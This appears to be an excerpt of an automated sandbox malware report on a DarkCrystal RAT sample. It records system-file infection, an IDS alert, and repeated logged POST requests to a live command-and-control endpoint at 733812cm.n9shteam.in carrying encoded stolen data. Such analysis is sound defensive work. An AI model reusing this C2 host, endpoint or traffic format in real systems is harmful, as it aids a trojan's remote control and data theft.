                            Source: Binary string: 8C:\Users\user\AppData\Local\Temp\hbljmznv\hbljmznv.pdb source: 9XHFe6y4Dj.exe, 00000000.00000002.2210751988.000000000351C000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: 8C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.pdb source: 9XHFe6y4Dj.exe, 00000000.00000002.2210751988.000000000351C000.00000004.00000800.00020000.00000000.sdmp

                            Spreading

                            barindex
                            Infects executable files (exe, dll, sys, html)
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile opened: C:\Users\userJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile opened: C:\Users\user\AppDataJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior

                            Networking

                            barindex
                            Suricata IDS alerts for network traffic
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49772 -> 188.114.96.3:80
                            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 384Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 384Expect: 100-continueData Raw: 5b 5e 59 5f 5a 5f 51 54 54 5b 52 57 50 59 57 56 50 50 5d 5c 50 52 57 5d 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c 54 54 50 45 5a 41 53 5b 5a 51 5e 50 58 55 50 5f 5a 5d 57 52 5e 5e 5f 55 41 58 50 5a 5d 58 55 5e 5d 5e 46 53 55 5d 50 58 59 52 51 5f 58 58 59 5c 5e 52 58 5c 5e 5d 5e 5a 59 54 5c 5d 5b 5d 57 51 56 56 51 5c 5d 47 59 5b 5d 59 5f 59 52 55 59 57 5d 43 58 5c 51 53 57 43 54 5d 5d 5b 5f 5b 58 5e 5c 5f 46 51 5e 5c 09 13 20 15 3e 1d 25 5f 31 05 3e 0e 2b 20 23 5b 26 28 35 1f 3f 2e 20 1f 3e 01 0a 5d 27 04 20 01 32 57 23 5a 24 2b 26 58 27 00 2d 07 28 10 23 46 01 17 20 1b 24 07 00 50 2e 05 28 11 26 32 28 5c 24 2f 20 5c 20 03 2b 10 31 13 26 13 33 06 33 55 3d 2f 06 55 2e 3e 07 51 2d 13 38 05 2d 22 36 01 24 0d 0c 15 32 3a 39 5a 32 0d 2f 10 21 02 25 07 23 11 35 56 3a 1f 0d 02 38 01 3e 00 3e 2b 2c 16 29 03 0e 15 28 16 20 05 23 0a 20 1a 32 2d 28 0d 33 3d 13 5e 3f 31 03 11 2a 04 36 56 2e 37 39 0a 2f 38 01 02 20 5b 21 09 28 3d 3d 5d 29 0e 28 5b 23 32 3f 12 3f 03 2c 00 3f 16 08 11 29 33 0d 12 2f 02 5b 53 04 38 56 54 Data Ascii: [^Y_Z_QTT[RWPYWVPP]\PRW]\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ >%_1>+ #[&(5?. >]' 2W#Z$+&X'-(#F $P.(&2(\$/ \ +1&33U=/U.>Q-8-"6$2:9Z2/!%#5V:8>>+,)( # 2-(3=^?1*6V.79/8 [!(==])([#2??,?)3/[S8VT
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 1852Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 174204Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 540Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 540Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: multipart/form-data; boundary=----PQcgF7jnhOKLEmV1Ax6w3qxWXTGsxRwGM3User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2766Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: multipart/form-data; boundary=----QI6wl6V6KaS8EXIot5lUNMy5wHVoGou1rcUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2982Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 1924Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2520Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 540Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 1924Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GvMv93IGtr13jYgJ5FalRo73Vuj4HCErNXUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2978Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 1948Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 532Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: multipart/form-data; boundary=----OBAJkATLExqqd3jrm1ca4QICBXNQGpX11RUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 3006Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 1948Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 540Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: multipart/form-data; boundary=----kb7tTFdb12NMuTS2CcOxlSJ9VLjfvA7Zu8User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 3014Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2520Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 1948Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 1948Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 540Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: multipart/form-data; boundary=----3oAOdiIl49AxLPl4c1kCJFK8qkwOizznqmUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 3014Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2520Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 1948Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2520Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 540Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: multipart/form-data; boundary=----8D1LOFt4DACq1zbtAcv6ZhD79KhTHwh7CGUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 3182Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 1924Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 540Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 540Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: multipart/form-data; boundary=----Pv8pm7zxVL6QdYKSFHyggQKKz8qKsZUW2ZUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 3014Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /DefaultWordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 733812cm.n9shteam.inContent-Length: 2528Expect: 100-continue
